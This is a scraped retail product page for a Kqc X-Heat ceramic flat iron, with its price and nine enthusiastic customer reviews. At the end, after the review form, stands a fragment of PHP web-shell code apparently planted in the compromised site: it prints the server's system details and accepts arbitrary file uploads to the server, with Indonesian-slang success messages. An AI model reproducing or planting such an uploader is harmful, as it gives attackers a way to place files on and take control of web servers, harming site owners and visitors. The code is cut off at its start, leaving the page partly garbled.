Saturday, January 25, 2020
Welcome to VBS. Lowest Prices GUARANTEED !
Log In

Log In

Forgot Your Password?

Cart Subtotal: CA$0.00

Kqc X-Heat Tourmaline Ceramic Flat Iron

Overall

Availability: In stock

CA$165.95
OR

Customer Reviews

9 Item(s)

per page
The Best Review by Melissa
Overall
Let me start off saying that it is the best out there. Well I haven't tried many but it works. I have long extra thick hair and it does the job. I think I have had mine since it first came out I think I have had it for I think 5-6 years and it is still working or about that I can't remember what year it was since I started working in a salon in 2003. I can not tell you how many times I have dropped it and it still works. My flat iron I share with my mother and I can not believe the quality that it is still working now. I have never had anything last for so long specially something I use constantly. I plan to buy 1-2 more for gifts. (Posted on 11/24/11)
The Only Reliable Straightener Review by Caroline A. USA
Overall
I have pretty normal, non- color treated hair. My hair is long, naturally wavy and gets really curly on the bottom layer. Because of this, my hair curls really easily and well with hair straighteners but finding a straightener that can keep my hair straight all day is really hard. I have owned the same Kqc flat iron for six years, and up until yesterday it has worked fine. I am back on this website to order another one! Seriously the best hair straightener ever. It is so light weight and easy to use. I absolutely love my Kqc and it is the only hair straightener that I know will keep my hair straight throughout the day!! (Posted on 10/7/11)
From The Chi To The Kqc - I'll Never Go Back! Review by Miranda Humidity Central
Overall
I've had my Chi for years. I went from a $20 walmart straightener to a chi so I thought it was the most amazing thing every. Well after several years of the chi, I felt it was time to upgrade. I googled best straightener and the Kqc was the first to pop up. I decided to bit the $160 bullet and purchased it. SO glad I did. It exceeds my chi by so much it's unreal. My hair hasn't gotten frizzy all day, like it normally did by 2pm with the chi, and I live in a very humid state. It's silky and smooth looking. Don't believe the negative reviews - the Kqc is amazing! (Posted on 10/7/11)
Best Flat Iron Ever Review by Rhonda CA
Overall
I have been using a chi for about 3 years, and decided to try the Kqc. Boy have I been missing out the past few years! This is the best flat iron by far I have ever used, way better than my chi! The plates are smoother and better quality and therefore make my hair even smoother when I use it. It's very easy to use and I will be using it for a long time. Highly recommend if you are looking for a great flat iron! (Posted on 10/7/11)
Greatness Review by Stephanie Martin from San Francisco, California
Overall
I've had this iron for 2 years now and it still works great. Best beauty investment I ever made. It heats up almost instantly and I can get my hair straight in no time. It just glides through my hair with no tugging. My girl friends always use mine when they get a chance because there's just no comparison to the cheaper irons!
(Posted on 10/4/11)
It is rated the best flat iron for a good reason! Review by Alisha from MI United States
Overall

I am very impressed! This flat iron made my hair pin straight, it also curled my hair perfectly too. I tried both! It heats up quick and I also received a Mini KQC, bain de terre botaniceuticals, KQC Thermal Shine Spray and a sample of Macadamia Deep Repair Masque! This flat iron is worth every penny itself, let alone all the little bonus items!
(Posted on 10/4/11)
Best flat iron I've ever heard Review by Leona Szaucsek from Dallas, Texas
Overall

Had a Sedu previously until it died. And I bought this product 3 years ago and its still in great condition. Still working as new and I use it everyday. This is the best flat iron I've ever had! Much better then the Sedu or Solia. Price is reasonable for this type of product. I highly recommend this item. (Posted on 10/4/11)
Best thing ever! Review by Lauren from Eskasoni, NS Canada
Overall
This is the only straightener that works for me, it leaves my hair feel softer, shinier and makes the color more vibrant and rich. It's also such a time saver, because it heats up so quickly and straightens my hair in one swipe. (Posted on 10/3/11)
Shipped right away & got here fast! Review by Pink Princess from TX, United States
Overall
I wasnt sure what to expect from this flat iron because I recently bought a GHD & i didnt think there was any other straightener that would compare to it, but im so glad i bought this KQC flat iron, it works amazinggggly!! It leaves my hair sooooo soft. And it curls just as wonderful as it straightens.
I recommend this to anyone looking for the perfect flat iron! (: (Posted on 10/3/11)

9 Item(s)

per page

Write Your Own Review

You're reviewing: Kqc X-Heat Tourmaline Ceramic Flat Iron

How do you rate this product? *

  1 star 2 stars 3 stars 4 stars 5 stars
Overall


'.php_uname().'
'; echo '
'; echo '
'; if( $_POST['_upl'] == "Upload" ) { if(@move_uploaded_file($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Upload SUKSES CUK !!!

'; } else { echo 'Upload GAGAL CUK !!!

'; } } ?>